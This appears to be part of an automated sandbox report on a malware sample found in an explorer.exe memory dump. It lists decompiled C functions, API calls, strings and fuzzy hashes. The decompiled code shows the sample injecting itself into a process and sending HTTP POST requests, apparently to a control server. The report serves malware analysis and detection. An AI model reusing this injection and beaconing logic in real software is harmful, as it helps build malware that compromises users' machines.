                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          • SysAllocString.OLEAUT32(00000000), ref: 000CDBE5
                                          • SysAllocString.OLEAUT32(00000000), ref: 000CDBF9
                                          • SysFreeString.OLEAUT32(?), ref: 000CDF82
                                          • SysFreeString.OLEAUT32(?), ref: 000CDF8B
                                            • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                          • String ID: FALSE$TRUE
                                          • API String ID: 1290676130-1412513891
                                          • Opcode ID: 8f64d99d8bddc0f8d05caa57733e82f9ebc56da19da8ac571dec7ef87d777a96
                                          • Instruction ID: 6d3b30d497bcb0c8dfd19b86225b387c7b8e5a58e6196622d1d0c5e8feda6800
                                          • Opcode Fuzzy Hash: 8f64d99d8bddc0f8d05caa57733e82f9ebc56da19da8ac571dec7ef87d777a96
                                          • Instruction Fuzzy Hash: DCE14F71D00219AFDB54EFA4C989FEEBBB9FF48300F10816EE505AB291DB75A905CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E000CC6C0(intOrPtr __ecx, intOrPtr __edx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				char _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				intOrPtr _v36;
                                          				struct HINSTANCE__* _v40;
                                          				char _v44;
                                          				char _v56;
                                          				char _v72;
                                          				struct _WNDCLASSEXA _v120;
                                          				intOrPtr _t69;
                                          				intOrPtr _t71;
                                          				intOrPtr _t75;
                                          				intOrPtr _t80;
                                          				intOrPtr _t92;
                                          				intOrPtr _t95;
                                          				intOrPtr _t96;
                                          				struct HWND__* _t106;
                                          				intOrPtr* _t113;
                                          				struct HINSTANCE__* _t116;
                                          				intOrPtr _t120;
                                          				intOrPtr _t126;
                                          				intOrPtr _t131;
                                          				intOrPtr _t134;
                                          				intOrPtr _t136;
                                          				intOrPtr _t139;
                                          				char _t140;
                                          				intOrPtr _t141;
                                          
                                          				_t69 =  *0xde688; // 0xf0000
                                          				_t126 = __ecx;
                                          				_t134 = __edx;
                                          				_t116 = 0;
                                          				_v36 = __edx;
                                          				_v16 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				_v24 = 0;
                                          				_v20 = __ecx;
                                          				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                          					E000CE23E(0x1f4);
                                          					_t116 = 0;
                                          				}
                                          				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                          				_v28 = _t116;
                                          				if( *_t113 != 0x4550) {
                                          					L12:
                                          					if(_v8 != 0) {
                                          						_t75 =  *0xde780; // 0x0
                                          						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                          						_v8 = _v8 & 0x00000000;
                                          					}
                                          					L14:
                                          					if(_v12 != 0) {
                                          						_t136 =  *0xde780; // 0x0
                                          						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                                          					}
                                          					if(_v16 != 0) {
                                          						_t71 =  *0xde780; // 0x0
                                          						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                                          					}
                                          					return _v8;
                                          				}
                                          				_push(_t116);
                                          				_push(0x8000000);
                                          				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                          				_push(0x40);
                                          				_push( &_v44);
                                          				_push(_t116);
                                          				_push(0xe);
                                          				_push( &_v16);
                                          				_t80 =  *0xde780; // 0x0
                                          				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                                          					goto L12;
                                          				}
                                          				_v120.style = 0xb;
                                          				_v120.cbSize = 0x30;
                                          				_v120.lpszClassName =  &_v56;
                                          				asm("movsd");
                                          				_v120.lpfnWndProc = DefWindowProcA;
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsb");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsw");
                                          				asm("movsb");
                                          				_v120.cbWndExtra = 0;
                                          				_v120.lpszMenuName = 0;
                                          				_v120.cbClsExtra = 0;
                                          				_v120.hInstance = 0;
                                          				if(RegisterClassExA( &_v120) != 0) {
                                          					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                                          					if(_t106 != 0) {
                                          						DestroyWindow(_t106);
                                          						UnregisterClassA( &_v56, 0);
                                          					}
                                          				}
                                          				_t139 =  *0xde780; // 0x0
                                          				_push(0x40);
                                          				_push(0);
                                          				_push(2);
                                          				_push( &_v24);
                                          				_push(0);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v12);
                                          				_push(GetCurrentProcess());
                                          				_push(_v16);
                                          				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                                          					_t126 = _v20;
                                          					goto L12;
                                          				} else {
                                          					_push(0x40);
                                          					_push(0);
                                          					_push(2);
                                          					_push( &_v24);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t126 = _v20;
                                          					_push( &_v8);
                                          					_t92 =  *0xde780; // 0x0
                                          					_push(_t126);
                                          					_push(_v16);
                                          					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                                          						goto L12;
                                          					}
                                          					_t140 = E000C8669( *0xde688, 0x1ac4);
                                          					_v32 = _t140;
                                          					if(_t140 == 0) {
                                          						goto L12;
                                          					}
                                          					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                          					_t95 =  *0xde684; // 0x14cf8f0
                                          					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                                          					_t120 =  *0xde684; // 0x14cf8f0
                                          					_t131 = _t96;
                                          					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                          					E000C861A( &_v32, 0x1ac4);
                                          					_t141 =  *0xde688; // 0xf0000
                                          					 *0xde688 = _t131;
                                          					E000C86E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                          					E000CC63F(_v12, _v8, _v36);
                                          					 *0xde688 = _t141;
                                          					goto L14;
                                          				}
                                          			}


                                          APIs
                                          • RegisterClassExA.USER32 ref: 000CC785
                                          • CreateWindowExA.USER32 ref: 000CC7B0
                                          • DestroyWindow.USER32 ref: 000CC7BB
                                          • UnregisterClassA.USER32(?,00000000), ref: 000CC7C6
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 000CC7E2
                                          • GetCurrentProcess.KERNEL32(00000000), ref: 000CC8DB
                                            • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                                          • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                          • API String ID: 3082384575-2319545179
                                          • Opcode ID: 30f02b7e46c7d71ff10a185c5fbaa52410663a017795f1e9a48535fd24a3d570
                                          • Instruction ID: 90c4ed74458554630278fabfd861411d24eeea79e783751d3e5e158c8fbe04a2
                                          • Opcode Fuzzy Hash: 30f02b7e46c7d71ff10a185c5fbaa52410663a017795f1e9a48535fd24a3d570
                                          • Instruction Fuzzy Hash: EF711971901249AFEB11DF95DC48FAFBBB9EF49700F14406AF905AB290D774AA04CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                                          				char _v8;
                                          				char _v16;
                                          				short _v144;
                                          				short _v664;
                                          				void* _t19;
                                          				struct HINSTANCE__* _t22;
                                          				long _t23;
                                          				long _t24;
                                          				char* _t27;
                                          				WCHAR* _t32;
                                          				long _t33;
                                          				intOrPtr _t37;
                                          				intOrPtr _t38;
                                          				void* _t49;
                                          				int _t53;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				void* _t57;
                                          
                                          				_t49 = __edx;
                                          				OutputDebugStringA("Hello qqq");
                                          				if(_a8 != 1) {
                                          					if(_a8 != 0) {
                                          						L12:
                                          						return 1;
                                          					}
                                          					SetLastError(0xaa);
                                          					L10:
                                          					return 0;
                                          				}
                                          				E000C85EF();
                                          				_t19 = E000C980C( &_v16);
                                          				_t57 = _t49;
                                          				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                                          					goto L12;
                                          				} else {
                                          					E000C8F78();
                                          					GetModuleHandleA(0);
                                          					_t22 = _a4;
                                          					 *0xde69c = _t22;
                                          					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                          					_t24 = GetLastError();
                                          					if(_t23 != 0 && _t24 != 0x7a) {
                                          						memset( &_v144, 0, 0x80);
                                          						_t55 = _t54 + 0xc;
                                          						_t53 = 0;
                                          						do {
                                          							_t27 = E000C95C7(_t53);
                                          							_a8 = _t27;
                                          							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                          							E000C85C2( &_a8);
                                          							_t53 = _t53 + 1;
                                          						} while (_t53 < 0x2710);
                                          						E000D2A5B( *0xde69c);
                                          						 *_t55 = 0x7c3;
                                          						 *0xde684 = E000CE1BC(0xdba28, 0x11c);
                                          						 *_t55 = 0xb4e;
                                          						_t32 = E000C95E1(0xdba28);
                                          						_a8 = _t32;
                                          						_t33 = GetFileAttributesW(_t32);
                                          						_push( &_a8);
                                          						if(_t33 == 0xffffffff) {
                                          							E000C85D5();
                                          							_v8 = 0;
                                          							_t37 =  *0xde684; // 0x14cf8f0
                                          							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E000C5E06, 0, 0,  &_v8);
                                          							 *0xde6a8 = _t38;
                                          							if(_t38 == 0) {
                                          								goto L10;
                                          							}
                                          							goto L12;
                                          						}
                                          						E000C85D5();
                                          					}
                                          					goto L10;
                                          				}
                                          			}


                                          APIs
                                          • OutputDebugStringA.KERNEL32(Hello qqq), ref: 000C5F92
                                          • SetLastError.KERNEL32(000000AA), ref: 000C60D7
                                            • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
                                            • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 000C5FCC
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 000C5FE7
                                          • GetLastError.KERNEL32 ref: 000C5FEF
                                          • memset.MSVCRT ref: 000C6013
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 000C6035
                                          • GetFileAttributesW.KERNEL32(00000000), ref: 000C6083
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemWidememset
                                          • String ID: Hello qqq
                                          • API String ID: 3872149766-3610097158
                                          • Opcode ID: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
                                          • Instruction ID: 2d4d97f5f62f02f8306ca91f288e7d0caa95757fa3380263e34e887ee25bd247
                                          • Opcode Fuzzy Hash: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
                                          • Instruction Fuzzy Hash: 6831A670900604ABEB64BB34DC49FAF3BB8EB55710F20852EF915D6192DF789A49CB31
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E000CE668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                          				char _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				intOrPtr _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				char _v64;
                                          				int _v76;
                                          				void* _v80;
                                          				intOrPtr _v100;
                                          				int _v104;
                                          				void* _v108;
                                          				intOrPtr _v112;
                                          				intOrPtr _v116;
                                          				char* _v120;
                                          				void _v124;
                                          				char _v140;
                                          				void _v396;
                                          				void _v652;
                                          				intOrPtr _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr* _t115;
                                          				intOrPtr _t118;
                                          				intOrPtr _t121;
                                          				intOrPtr _t124;
                                          				intOrPtr _t127;
                                          				intOrPtr _t131;
                                          				char _t133;
                                          				intOrPtr _t136;
                                          				char _t138;
                                          				char _t139;
                                          				intOrPtr _t141;
                                          				intOrPtr _t147;
                                          				intOrPtr _t154;
                                          				intOrPtr _t158;
                                          				intOrPtr _t162;
                                          				intOrPtr _t164;
                                          				intOrPtr _t166;
                                          				intOrPtr _t172;
                                          				intOrPtr _t176;
                                          				void* _t183;
                                          				void* _t185;
                                          				intOrPtr _t186;
                                          				char _t195;
                                          				intOrPtr _t203;
                                          				intOrPtr _t204;
                                          				signed int _t209;
                                          				void _t212;
                                          				intOrPtr _t213;
                                          				void* _t214;
                                          				intOrPtr _t216;
                                          				char _t217;
                                          				intOrPtr _t218;
                                          				signed int _t219;
                                          				signed int _t220;
                                          				void* _t221;
                                          
                                          				_v40 = _v40 & 0x00000000;
                                          				_v24 = 4;
                                          				_v36 = 1;
                                          				_t214 = __edx;
                                          				memset( &_v396, 0, 0x100);
                                          				memset( &_v652, 0, 0x100);
                                          				_v64 = E000C95C7(0x85b);
                                          				_v60 = E000C95C7(0xdc9);
                                          				_v56 = E000C95C7(0x65d);
                                          				_v52 = E000C95C7(0xdd3);
                                          				_t105 = E000C95C7(0xb74);
                                          				_v44 = _v44 & 0;
                                          				_t212 = 0x3c;
                                          				_v48 = _t105;
                                          				memset( &_v124, 0, 0x100);
                                          				_v116 = 0x10;
                                          				_v120 =  &_v140;
                                          				_v124 = _t212;
                                          				_v108 =  &_v396;
                                          				_v104 = 0x100;
                                          				_v80 =  &_v652;
                                          				_push( &_v124);
                                          				_push(0);
                                          				_v76 = 0x100;
                                          				_push(E000CC379(_t214));
                                          				_t113 =  *0xde6a4; // 0x14cfe60
                                          				_push(_t214);
                                          				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                          					_t209 = 0;
                                          					_v20 = 0;
                                          					do {
                                          						_t115 =  *0xde6a4; // 0x14cfe60
                                          						_v12 = 0x8404f700;
                                          						_t213 =  *_t115( *0xde788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                          						if(_t213 != 0) {
                                          							_t195 = 3;
                                          							_t185 = 4;
                                          							_v8 = _t195;
                                          							_t118 =  *0xde6a4; // 0x14cfe60
                                          							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                          							_v8 = 0x3a98;
                                          							_t121 =  *0xde6a4; // 0x14cfe60
                                          							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                          							_v8 = 0x493e0;
                                          							_t124 =  *0xde6a4; // 0x14cfe60
                                          							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                          							_v8 = 0x493e0;
                                          							_t127 =  *0xde6a4; // 0x14cfe60
                                          							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                          							_t131 =  *0xde6a4; // 0x14cfe60
                                          							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                          							if(_a24 != 0) {
                                          								E000C980C(_a24);
                                          							}
                                          							if(_t186 != 0) {
                                          								_t133 = 0x8484f700;
                                          								if(_v112 != 4) {
                                          									_t133 = _v12;
                                          								}
                                          								_t136 =  *0xde6a4; // 0x14cfe60
                                          								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                          								_v8 = _t216;
                                          								if(_a24 != 0) {
                                          									E000C980C(_a24);
                                          								}
                                          								if(_t216 != 0) {
                                          									_t138 = 4;
                                          									if(_v112 != _t138) {
                                          										L19:
                                          										_t139 = E000C95C7(0x777);
                                          										_t217 = _t139;
                                          										_v12 = _t217;
                                          										_t141 =  *0xde6a4; // 0x14cfe60
                                          										_t218 = _v8;
                                          										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E000CC379(_t217), _a4, _a8);
                                          										E000C85C2( &_v12);
                                          										if(_a24 != 0) {
                                          											E000C980C(_a24);
                                          										}
                                          										if(_v28 != 0) {
                                          											L28:
                                          											_v24 = 8;
                                          											_push(0);
                                          											_v32 = 0;
                                          											_v28 = 0;
                                          											_push( &_v24);
                                          											_push( &_v32);
                                          											_t147 =  *0xde6a4; // 0x14cfe60
                                          											_push(0x13);
                                          											_push(_t218);
                                          											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                          												_t219 = E000C9749( &_v32);
                                          												if(_t219 == 0xc8) {
                                          													 *_a20 = _v8;
                                          													 *_a12 = _t213;
                                          													 *_a16 = _t186;
                                          													return 0;
                                          												}
                                          												_t220 =  ~_t219;
                                          												L32:
                                          												_t154 =  *0xde6a4; // 0x14cfe60
                                          												 *((intOrPtr*)(_t154 + 8))(_v8);
                                          												L33:
                                          												if(_t186 != 0) {
                                          													_t158 =  *0xde6a4; // 0x14cfe60
                                          													 *((intOrPtr*)(_t158 + 8))(_t186);
                                          												}
                                          												if(_t213 != 0) {
                                          													_t203 =  *0xde6a4; // 0x14cfe60
                                          													 *((intOrPtr*)(_t203 + 8))(_t213);
                                          												}
                                          												return _t220;
                                          											}
                                          											GetLastError();
                                          											_t220 = 0xfffffff8;
                                          											goto L32;
                                          										} else {
                                          											GetLastError();
                                          											_t162 =  *0xde6a4; // 0x14cfe60
                                          											 *((intOrPtr*)(_t162 + 8))(_t218);
                                          											_t218 = 0;
                                          											goto L23;
                                          										}
                                          									}
                                          									_v12 = _t138;
                                          									_push( &_v12);
                                          									_push( &_v16);
                                          									_t172 =  *0xde6a4; // 0x14cfe60
                                          									_push(0x1f);
                                          									_push(_t216);
                                          									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                          										L18:
                                          										GetLastError();
                                          										goto L19;
                                          									}
                                          									_v16 = _v16 | 0x00003380;
                                          									_push(4);
                                          									_push( &_v16);
                                          									_t176 =  *0xde6a4; // 0x14cfe60
                                          									_push(0x1f);
                                          									_push(_t216);
                                          									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                          										goto L19;
                                          									}
                                          									goto L18;
                                          								} else {
                                          									GetLastError();
                                          									L23:
                                          									_t164 =  *0xde6a4; // 0x14cfe60
                                          									 *((intOrPtr*)(_t164 + 8))(_t186);
                                          									_t186 = 0;
                                          									goto L24;
                                          								}
                                          							} else {
                                          								GetLastError();
                                          								L24:
                                          								_t166 =  *0xde6a4; // 0x14cfe60
                                          								 *((intOrPtr*)(_t166 + 8))(_t213);
                                          								_t213 = 0;
                                          								goto L25;
                                          							}
                                          						}
                                          						GetLastError();
                                          						L25:
                                          						_t204 = _t218;
                                          						_t209 = _v20 + 1;
                                          						_v20 = _t209;
                                          					} while (_t209 < 2);
                                          					_v8 = _t218;
                                          					if(_t204 != 0) {
                                          						goto L28;
                                          					}
                                          					_t220 = 0xfffffffe;
                                          					goto L33;
                                          				}
                                          				_t183 = 0xfffffffc;
                                          				return _t183;
                                          			}

                                          0x000ce91a
                                          0x000ce91d
                                          0x00000000
                                          0x000ce91d
                                          0x000ce81c
                                          0x000ce81c
                                          0x000ce91f
                                          0x000ce91f
                                          0x000ce925
                                          0x000ce928
                                          0x00000000
                                          0x000ce928
                                          0x000ce81a
                                          0x000ce785
                                          0x000ce92a
                                          0x000ce92d
                                          0x000ce92f
                                          0x000ce932
                                          0x000ce935
                                          0x000ce93e
                                          0x000ce943
                                          0x00000000
                                          0x00000000
                                          0x000ce947
                                          0x00000000
                                          0x000ce947
                                          0x000ce754
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$ErrorLast
                                          • String ID: POST
                                          • API String ID: 2570506013-1814004025
                                          • Opcode ID: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
                                          • Instruction ID: 4d43e44888571cf18f116a7444a457047133596d59fd9b6ecec0fcfd96a40a65
                                          • Opcode Fuzzy Hash: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
                                          • Instruction Fuzzy Hash: 5FB12C71901248AFEB55DFA4DC89FEE7BB8EF18310F10406AF505EB291DB749A44CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E000D16B8(signed int* _a4) {
                                          				char _v8;
                                          				_Unknown_base(*)()* _v12;
                                          				_Unknown_base(*)()* _v16;
                                          				char _v20;
                                          				_Unknown_base(*)()* _t16;
                                          				_Unknown_base(*)()* _t17;
                                          				void* _t22;
                                          				intOrPtr* _t28;
                                          				signed int _t29;
                                          				signed int _t30;
                                          				struct HINSTANCE__* _t32;
                                          				void* _t34;
                                          
                                          				_t30 = 0;
                                          				_v8 = 0;
                                          				_t32 = GetModuleHandleA("advapi32.dll");
                                          				if(_t32 == 0) {
                                          					L9:
                                          					return 1;
                                          				}
                                          				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                                          				_v12 = _t16;
                                          				if(_t16 == 0) {
                                          					goto L9;
                                          				}
                                          				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                                          				_v16 = _t17;
                                          				if(_t17 == 0) {
                                          					goto L9;
                                          				}
                                          				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                                          				if(_t28 == 0) {
                                          					goto L9;
                                          				}
                                          				_push(0xf0000000);
                                          				_push(1);
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v8);
                                          				if(_v12() == 0) {
                                          					goto L9;
                                          				}
                                          				_t22 = _v16(_v8, 4,  &_v20);
                                          				 *_t28(_v8, 0);
                                          				if(_t22 == 0) {
                                          					goto L9;
                                          				}
                                          				_t29 = 0;
                                          				do {
                                          					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                                          					_t29 = _t29 + 1;
                                          				} while (_t29 < 4);
                                          				 *_a4 = _t30;
                                          				return 0;
                                          			}
















                                          APIs
                                          • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,000C765A,?,?,00000000,?), ref: 000D16CB
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000D16E3
                                          • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000D16F2
                                          • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 000D1701
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                          • API String ID: 667068680-129414566
                                          • Opcode ID: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
                                          • Instruction ID: d4b23a3b7ac53867078bef81616309f1c6fba6ca7a6e27690adaf6b111cb43cd
                                          • Opcode Fuzzy Hash: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
                                          • Instruction Fuzzy Hash: CF117332A05715BBEB615BEA8C84EEF7BF9AF45780B044066EA15F6350DE70D9008B74
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E000D2122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                          				signed int _t12;
                                          				signed int _t13;
                                          				int _t15;
                                          				char* _t24;
                                          				char* _t26;
                                          				char* _t28;
                                          				char* _t29;
                                          				signed int _t40;
                                          				char* _t43;
                                          				char* _t45;
                                          				long long* _t47;
                                          
                                          				_t12 = _a20;
                                          				if(_t12 == 0) {
                                          					_t12 = 0x11;
                                          				}
                                          				_t26 = _a4;
                                          				_push(_t30);
                                          				 *_t47 = _a12;
                                          				_push(_t12);
                                          				_push("%.*g");
                                          				_push(_a8);
                                          				_push(_t26);
                                          				L000D2285();
                                          				_t40 = _t12;
                                          				if(_t40 < 0 || _t40 >= _a8) {
                                          					L19:
                                          					_t13 = _t12 | 0xffffffff;
                                          					goto L20;
                                          				} else {
                                          					L000D22CD();
                                          					_t15 =  *((intOrPtr*)( *_t12));
                                          					if(_t15 != 0x2e) {
                                          						_t24 = strchr(_t26, _t15);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0x2e;
                                          						}
                                          					}
                                          					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                          						L11:
                                          						_t43 = strchr(_t26, 0x65);
                                          						_t28 = _t43;
                                          						if(_t43 == 0) {
                                          							L18:
                                          							_t13 = _t40;
                                          							L20:
                                          							return _t13;
                                          						}
                                          						_t45 = _t43 + 1;
                                          						_t29 = _t28 + 2;
                                          						if( *_t45 == 0x2d) {
                                          							_t45 = _t29;
                                          						}
                                          						while( *_t29 == 0x30) {
                                          							_t29 = _t29 + 1;
                                          						}
                                          						if(_t29 != _t45) {
                                          							E000C8706(_t45, _t29, _t40 - _t29 + _a4);
                                          							_t40 = _t40 + _t45 - _t29;
                                          						}
                                          						goto L18;
                                          					} else {
                                          						_t6 = _t40 + 3; // 0xd09b2
                                          						_t12 = _t6;
                                          						if(_t12 >= _a8) {
                                          							goto L19;
                                          						}
                                          						_t26[_t40] = 0x302e;
                                          						( &(_t26[2]))[_t40] = 0;
                                          						_t40 = _t40 + 2;
                                          						goto L11;
                                          					}
                                          				}
                                          			}















                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strchr$_snprintflocaleconv
                                          • String ID: %.*g
                                          • API String ID: 1910550357-952554281
                                          • Opcode ID: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
                                          • Instruction ID: f6153b53931c816f5cf90fdbc4519a87119c60c3e64c05486d80ffcae23a6d65
                                          • Opcode Fuzzy Hash: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
                                          • Instruction Fuzzy Hash: B721337B6447427AD7254A289CC6BBA7BCCDF75320F158117FE109A382EA74EC4093B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _snprintfqsort
                                          • String ID: %I64d$false$null$true
                                          • API String ID: 756996078-4285102228
                                          • Opcode ID: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
                                          • Instruction ID: 684f5bda4ccecb9397834d04cf382ea593694727c20340f8e6e8807afc758164
                                          • Opcode Fuzzy Hash: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
                                          • Instruction Fuzzy Hash: 9EE16DB190030ABBDF119F64DC46FEF3BA9EF55344F10801AFD1996242EA31DA619BB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 000CD75C
                                          • SysAllocString.OLEAUT32(?), ref: 000CD764
                                          • SysAllocString.OLEAUT32(00000000), ref: 000CD778
                                          • SysFreeString.OLEAUT32(?), ref: 000CD7F3
                                          • SysFreeString.OLEAUT32(?), ref: 000CD7F6
                                          • SysFreeString.OLEAUT32(?), ref: 000CD7FB
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
